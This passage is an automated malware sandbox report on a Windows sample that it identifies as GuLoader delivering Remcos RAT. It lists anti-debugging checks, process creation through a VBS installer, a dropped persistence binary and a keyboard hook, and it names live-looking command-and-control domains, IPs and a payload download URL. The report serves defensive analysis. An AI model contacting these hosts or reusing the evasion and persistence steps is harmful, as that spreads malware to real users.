Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF46A0 mov eax, dword ptr fs:[00000030h] 2_2_02BF46A0
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C01BCE mov eax, dword ptr fs:[00000030h] 2_2_02C01BCE
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BFC054 mov eax, dword ptr fs:[00000030h] 2_2_02BFC054
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BFE990 mov eax, dword ptr fs:[00000030h] 2_2_02BFE990
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0057C054 mov eax, dword ptr fs:[00000030h] 9_2_0057C054
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_005746A0 mov eax, dword ptr fs:[00000030h] 9_2_005746A0
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00581BCE mov eax, dword ptr fs:[00000030h] 9_2_00581BCE
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0057E990 mov eax, dword ptr fs:[00000030h] 9_2_0057E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C246A0 mov eax, dword ptr fs:[00000030h] 15_2_02C246A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C31BCE mov eax, dword ptr fs:[00000030h] 15_2_02C31BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2C054 mov eax, dword ptr fs:[00000030h] 15_2_02C2C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2E990 mov eax, dword ptr fs:[00000030h] 15_2_02C2E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F646A0 mov eax, dword ptr fs:[00000030h] 17_2_04F646A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6C054 mov eax, dword ptr fs:[00000030h] 17_2_04F6C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F71BCE mov eax, dword ptr fs:[00000030h] 17_2_04F71BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6E990 mov eax, dword ptr fs:[00000030h] 17_2_04F6E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235C054 mov eax, dword ptr fs:[00000030h] 18_2_0235C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_023546A0 mov eax, dword ptr fs:[00000030h] 18_2_023546A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235E990 mov eax, dword ptr fs:[00000030h] 18_2_0235E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02361BCE mov eax, dword ptr fs:[00000030h] 18_2_02361BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0057C054 mov eax, dword ptr fs:[00000030h] 20_2_0057C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_005746A0 mov eax, dword ptr fs:[00000030h] 20_2_005746A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00581BCE mov eax, dword ptr fs:[00000030h] 20_2_00581BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0057E990 mov eax, dword ptr fs:[00000030h] 20_2_0057E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0057C054 mov eax, dword ptr fs:[00000030h] 21_2_0057C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_005746A0 mov eax, dword ptr fs:[00000030h] 21_2_005746A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00581BCE mov eax, dword ptr fs:[00000030h] 21_2_00581BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0057E990 mov eax, dword ptr fs:[00000030h] 21_2_0057E990
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF742D LdrInitializeThunk, 2_2_02BF742D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0058474A RtlAddVectoredExceptionHandler, 9_2_0058474A

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe' Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' Jump to behavior
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program ManagerCJBCA\D
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program Manager#
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program ManagerCJB
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp Binary or memory string: Progman
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program ManagerCJBCA\
Source: Dlls.exe, 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp Binary or memory string: [ Program Manager ]
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program Managerr|
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program Manager2
Source: Dlls.exe, 00000013.00000002.142216216346.00000000008D9000.00000004.00000020.sdmp Binary or memory string: |Program Manager|
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program Manager~
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program Manager|

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR
Detected Remcos RAT
Source: Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp String found in binary or memory: Remcos_Mutex_Inj
Source: Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmp String found in binary or memory: Remcos_Mutex_InjJ
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1662 Sample: mU9H96igb3.exe Startdate: 14/10/2021 Architecture: WINDOWS Score: 100 48 implantecapilarpereira.com 2->48 50 Venonletmonitprradministratioran.loseyourip.com 2->50 64 Potential malicious icon found 2->64 66 Found malware configuration 2->66 68 Antivirus / Scanner detection for submitted sample 2->68 70 10 other signatures 2->70 11 mU9H96igb3.exe 2->11         started        14 Dlls.exe 2->14         started        16 Dlls.exe 2->16         started        18 Dlls.exe 2->18         started        signatures3 process4 signatures5 84 Tries to detect Any.run 11->84 86 Hides threads from debuggers 11->86 20 mU9H96igb3.exe 6 11 11->20         started        25 Dlls.exe 6 14->25         started        27 Dlls.exe 6 16->27         started        process6 dnsIp7 52 implantecapilarpereira.com 83.167.224.147, 49804, 49808, 49810 MASTER-ASCzechRepublicwwwmasterczCZ Czech Republic 20->52 42 C:\Users\user\AppData\Roaming\...\Dlls.exe, PE32 20->42 dropped 44 C:\Users\user\...\Dlls.exe:Zone.Identifier, ASCII 20->44 dropped 46 C:\Users\user\AppData\Local\...\install.vbs, data 20->46 dropped 72 Creates an undocumented autostart registry key 20->72 74 Tries to detect Any.run 20->74 76 Hides threads from debuggers 20->76 29 wscript.exe 1 20->29         started        file8 signatures9 process10 process11 31 cmd.exe 1 29->31         started        process12 33 Dlls.exe 31->33         started        36 conhost.exe 31->36         started        signatures13 56 Antivirus detection for dropped file 33->56 58 Multi AV Scanner detection for dropped file 33->58 60 Tries to detect Any.run 33->60 62 Hides threads from debuggers 33->62 38 Dlls.exe 2 9 33->38         started        process14 dnsIp15 54 Venonletmonitprradministratioran.loseyourip.com 8.6.8.23, 24091, 49809 AS-CHOOPAUS United States 38->54 78 Tries to detect Any.run 38->78 80 Hides threads from debuggers 38->80 82 Installs a global keyboard hook 38->82 signatures16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
8.6.8.23
 Venonletmonitprradministratioran.loseyourip.com United States
20473 AS-CHOOPAUS true
83.167.224.147
 implantecapilarpereira.com Czech Republic
24971 MASTER-ASCzechRepublicwwwmasterczCZ true

Contacted Domains

Name IP Active
Venonletmonitprradministratioran.loseyourip.com 8.6.8.23 true
implantecapilarpereira.com 83.167.224.147 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://implantecapilarpereira.com/NetGen true
  • Avira URL Cloud: safe
 unknown
monitprradministratioran.loseyourip.com true
  • Avira URL Cloud: safe
 unknown
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin false
  • Avira URL Cloud: safe
 unknown